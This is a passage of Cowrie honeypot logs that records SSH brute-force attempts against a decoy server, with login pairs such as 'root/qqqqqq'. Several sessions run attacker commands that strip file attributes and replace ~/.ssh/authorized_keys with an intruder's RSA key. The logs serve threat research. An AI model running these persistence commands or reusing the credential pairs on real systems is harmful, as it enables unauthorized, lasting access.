a-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:56.071635Z","src_ip":"103.217.145.104","session":"6e9927192d48"}
{"eventid":"cowrie.login.failed","username":"ark","password":"ark","message":"login attempt [ark/ark] failed","sensor":"my-vps","timestamp":"2025-08-26T04:27:57.196719Z","src_ip":"103.217.145.104","session":"6e9927192d48"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:58.469259Z","src_ip":"103.217.145.104","session":"6e9927192d48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55542,"dst_ip":"1.2.3.4","dst_port":22,"session":"1088e584c76f","protocol":"ssh","message":"New connection: 212.227.235.229:55542 (1.2.3.4:22) [session: 1088e584c76f]","sensor":"my-vps","timestamp":"2025-08-26T04:28:02.869541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:02.870513Z","src_ip":"212.227.235.229","session":"1088e584c76f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:03.139086Z","src_ip":"212.227.235.229","session":"1088e584c76f"}
{"eventid":"cowrie.login.failed","username":"deamon_root","password":"deamon_root","message":"login attempt [deamon_root/deamon_root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:28:04.257053Z","src_ip":"212.227.235.229","session":"1088e584c76f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:05.528086Z","src_ip":"212.227.235.229","session":"1088e584c76f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40138,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db09defb891","protocol":"ssh","message":"New connection: 212.227.235.229:40138 (1.2.3.4:22) [session: 6db09defb891]","sensor":"my-vps","timestamp":"2025-08-26T04:28:10.753723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:28:11.475591Z","src_ip":"212.227.235.229","session":"6db09defb891"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:28:11.477133Z","src_ip":"212.227.235.229","session":"6db09defb891"}
{"eventid":"cowrie.login.success","username":"root","password":"itadmin","message":"login attempt [root/itadmin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:28:15.572066Z","src_ip":"212.227.235.229","session":"6db09defb891"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:16.411117Z","src_ip":"212.227.235.229","session":"6db09defb891"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44118,"dst_ip":"1.2.3.4","dst_port":22,"session":"677ebceba67e","protocol":"ssh","message":"New connection: 212.227.235.229:44118 (1.2.3.4:22) [session: 677ebceba67e]","sensor":"my-vps","timestamp":"2025-08-26T04:28:35.444621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:35.445327Z","src_ip":"212.227.235.229","session":"677ebceba67e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:35.697912Z","src_ip":"212.227.235.229","session":"677ebceba67e"}
{"eventid":"cowrie.login.failed","username":"shop","password":"shop","message":"login attempt [shop/shop] failed","sensor":"my-vps","timestamp":"2025-08-26T04:28:36.754462Z","src_ip":"212.227.235.229","session":"677ebceba67e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:38.010967Z","src_ip":"212.227.235.229","session":"677ebceba67e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52672,"dst_ip":"1.2.3.4","dst_port":22,"session":"3018035386af","protocol":"ssh","message":"New connection: 212.227.235.229:52672 (1.2.3.4:22) [session: 3018035386af]","sensor":"my-vps","timestamp":"2025-08-26T04:28:47.885878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:47.886899Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:48.162917Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44424,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f972c5e932c","protocol":"ssh","message":"New connection: 212.227.235.229:44424 (1.2.3.4:22) [session: 4f972c5e932c]","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.074726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.075693Z","src_ip":"212.227.235.229","session":"4f972c5e932c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.150905Z","src_ip":"212.227.235.229","session":"4f972c5e932c"}
{"eventid":"cowrie.login.success","username":"root","password":"qqqqqq","message":"login attempt [root/qqqqqq] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.311638Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.login.failed","username":"pruebas","password":"123456","message":"login attempt [pruebas/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.495946Z","src_ip":"212.227.235.229","session":"4f972c5e932c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:28:49.884460Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.885163Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:28:49.886316Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:50.164048Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":53416,"dst_ip":"1.2.3.4","dst_port":23,"session":"4628e729ece7","protocol":"telnet","message":"New connection: 3.131.215.38:53416 (1.2.3.4:23) [session: 4628e729ece7]","sensor":"my-vps","timestamp":"2025-08-26T04:28:50.221442Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:50.578571Z","src_ip":"212.227.235.229","session":"4f972c5e932c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:28:50.820763Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:28:50.821451Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:28:51.099968Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:51.101080Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52676,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fb0e95d0785","protocol":"ssh","message":"New connection: 212.227.235.229:52676 (1.2.3.4:22) [session: 7fb0e95d0785]","sensor":"my-vps","timestamp":"2025-08-26T04:28:51.376415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:51.377150Z","src_ip":"212.227.235.229","session":"7fb0e95d0785"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:51.653067Z","src_ip":"212.227.235.229","session":"7fb0e95d0785"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:28:52.797768Z","src_ip":"212.227.235.229","session":"7fb0e95d0785"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:54.076830Z","src_ip":"212.227.235.229","session":"7fb0e95d0785"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52682,"dst_ip":"1.2.3.4","dst_port":22,"session":"02401d61b208","protocol":"ssh","message":"New connection: 212.227.235.229:52682 (1.2.3.4:22) [session: 02401d61b208]","sensor":"my-vps","timestamp":"2025-08-26T04:28:54.348434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:54.349235Z","src_ip":"212.227.235.229","session":"02401d61b208"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:54.623196Z","src_ip":"212.227.235.229","session":"02401d61b208"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:28:55.762344Z","src_ip":"212.227.235.229","session":"02401d61b208"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:56.038484Z","src_ip":"212.227.235.229","session":"02401d61b208"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:28:56.039505Z","src_ip":"212.227.235.229","session":"3018035386af"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":49570,"dst_ip":"1.2.3.4","dst_port":22,"session":"709469a1e5e5","protocol":"ssh","message":"New connection: 68.183.87.241:49570 (1.2.3.4:22) [session: 709469a1e5e5]","sensor":"my-vps","timestamp":"2025-08-26T04:28:59.084297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:28:59.085197Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:28:59.345808Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.session.closed","duration":10.115869522094727,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:00.337243Z","src_ip":"3.131.215.38","session":"4628e729ece7"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd@12345","message":"login attempt [root/P@ssw0rd@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:29:00.429384Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:29:01.021516Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:29:01.022270Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:29:01.023499Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
